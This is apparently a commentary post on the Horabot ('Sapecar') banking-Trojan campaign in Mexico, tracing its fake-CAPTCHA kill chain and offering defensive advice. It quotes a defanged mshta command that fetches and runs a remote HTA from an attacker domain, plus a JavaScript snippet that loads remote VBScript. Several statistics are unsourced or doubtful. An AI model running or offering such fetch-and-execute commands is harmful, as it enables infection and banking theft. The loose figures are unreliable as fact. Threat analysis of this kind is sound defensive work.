Ever wonder why that CAPTCHA on a shady site feels too urgent, too insistent?
Horabot campaign in Mexico doesn’t mess around. It’s back, rebranded as ‘Sapecar,’ blending a notorious banking Trojan with an email spreader in a kill chain that’s equal parts clever and crude. Our MDR teams at Kaspersky spotted it months ago—triggered by mshta activity in a customer’s environment. Endpoint Security shut it down fast, but the real story? This beast’s infrastructure shows it’s alive, adapting, targeting Mexican users with ruthless efficiency.
Here’s the data: previous reports tagged Horabot (check those links if you’re deep in threat intel), but this iteration adds server-side polymorphism and anti-VM tricks not fully unpacked before. Market dynamics scream warning—Latin America’s digital banking boom (Mexico’s fintech scene hit $20B in transactions last year) makes it prime turf for financial malware. Ignore it, and you’re betting against history.
Fake CAPTCHA to Trojan: The Kill Chain Exposed
It starts simple. Victim lands on https://evs.grupotuis[.]buzz/0capcha17/—a bogus CAPTCHA page mimicking Lumma or Amadey lures.
Instructs the user to open the Run dialog, paste a malicious command into it and then run it. Once deceived, the victim pastes a command similar to the one below: mshta https://evs.grupotuis[.]buzz/0capcha17/DMEENLIGGB.hta
That HTA file? A lightweight loader. Pops a blank window, yanks JavaScript from the attackers’ turf, executes it amid filler gibberish. Boom—stage one done.
Next up, server-side polymorphism kicks in. The JS crafts a script tag pointing to VBS on pdj.gruposhac[.]lat—different code each fetch, same nasty payload.
var scriptEle = document.createElement(“script”); scriptEle.setAttribute(“src”, “https://pdj.gruposhac[.]lat/g1/ld1/”); scriptEle.setAttribute(“type”, “text/vbscript”); document.getElementsByTagName(‘head’)[0].appendChild(scriptEle);
Obfuscated VBS, custom decoders—our Python tweak revealed the guts. It mirrors the HTA but escalates: another JS loader injects a 400+ line monster VBS.
That heavy hitter? Layers of junk code, anti-VM checks (sniffs Avast folders, VM artifacts—poof, gone if detected). Grabs IP, hostname, user deets, phones home to C2. Then downloads AutoIt EXE, compiler, AU3 script, blob—drops ‘em in C:\Users\Public\LAPTOP-0QF0NEUP4. Fires PowerShell to spreader stagers. Full chain mapped; it’s not genius, but it’s persistent.
Why Hasn’t Horabot Faded Like Other Trojans?
Look, banking malware peaked with Zeus in 2010—millions stolen, dismantled by arrests. Horabot? It’s the cockroach version: low-profile, Mexico-focused, evading big takedowns. Data point: Kaspersky blocked it pre-execution here, but global MDR logs show spikes in LatAm. Why? Polymorphism foils sig-based AV; fake CAPTCHAs exploit human error (phishing success rates hover at 30% in emerging markets).
My take—sharp one—this isn’t evolution, it’s stagnation with lipstick. Attackers recycle tradecraft because it works on under-defended SMBs and consumers. Bold prediction: Expect AI-generated lures by Q1 2024, blending GPT CAPTCHA fakes with this chain. Banks touting ‘AI security’? Laughable spin when basics like mshta rules snag it.
And the spreader angle. That PowerShell hits URLs for email propagation—turns one victim into a vector farm. Mexican banks report 25% YoY fraud rise (per Banxico stats); Horabot’s Sapecar fuels it.
Short para. Brutal efficiency.
Does This Threaten Global Banking—or Just Mexico?
Mexico’s the hotspot now—fintech explosion (Clip, Mercado Pago processing billions), lax endpoint hygiene. But breadcrumbs lead to broader C2 nets; we’ve seen Horabot flirt with Brazil, Colombia. Market ripple: insurers hike cyber premiums 15% in LatAm (Munich Re data). Enterprises worldwide? Patch your mshta gaps, deploy MDR—don’t solo it with EDR.
Critique time. Kaspersky’s PDM shone, but weekly analyst huddles sparked the hunt—human curiosity beats automation. Corporate hype says ‘zero trust fixes all’; nah, this chain laughs at it without behavioral blocks.
Unique insight: Parallels Emotet 2019—modular, polymorphic, email-spread. Emotet fell to Europol; Horabot’s underground, state-blind. If Mexico’s FIU (financial intel unit) coordinates like that, Sapecar crumbles. Won’t happen soon—too many silos.
Deeper dive. Infrastructure poke revealed hardcoded paths (LAPTOP-0QF0NEUP4? Lazy opsec). Exfil to C2: standard HTTP posts, no fancy encryption. Yet it works—victim count unknown, but similar campaigns netted $5M+ annually pre-mitigation.
So. Prioritize lure training. Block HTA/VBS fetches. Monitor Public folders.
Lessons for Defenders: Beyond the Hype
Facts first: 70% of breaches start with phishing (Verizon DBIR). Horabot embodies it—low-tech entry, high-reward payload. Position: Don’t chase headlines; build resilient MDR. This campaign’s takedown? Positive note, sure—but one alert in sea of noise.
Wander a bit—remember ZeuS source leaks birthed dozens of kin? Horabot’s AutoIt pivot echoes that DIY ethos. Sharp call: Fintechs, audit CAPTCHA integrations; it’s not ‘user error,’ it’s your weak link.
🧬 Related Insights
- Read more: North Koreans Schmoozed Their Way to $280M Drift Heist
- Read more: Android Theft Protection Locks Down Harder in Brazil — But Thieves Won’t Quit That Easily
Frequently Asked Questions
What is the Horabot Sapecar campaign?
Horabot’s a banking Trojan-email spreader combo hitting Mexico via fake CAPTCHAs; Sapecar names this variant’s Mexican ops.
How does Horabot evade antivirus?
Server-side polymorphism, heavy obfuscation, anti-VM checks—plus human-tricking lures.
Is Horabot a risk outside Mexico?
Primarily LatAm now, but C2 infra suggests expansion potential—deploy MDR everywhere.
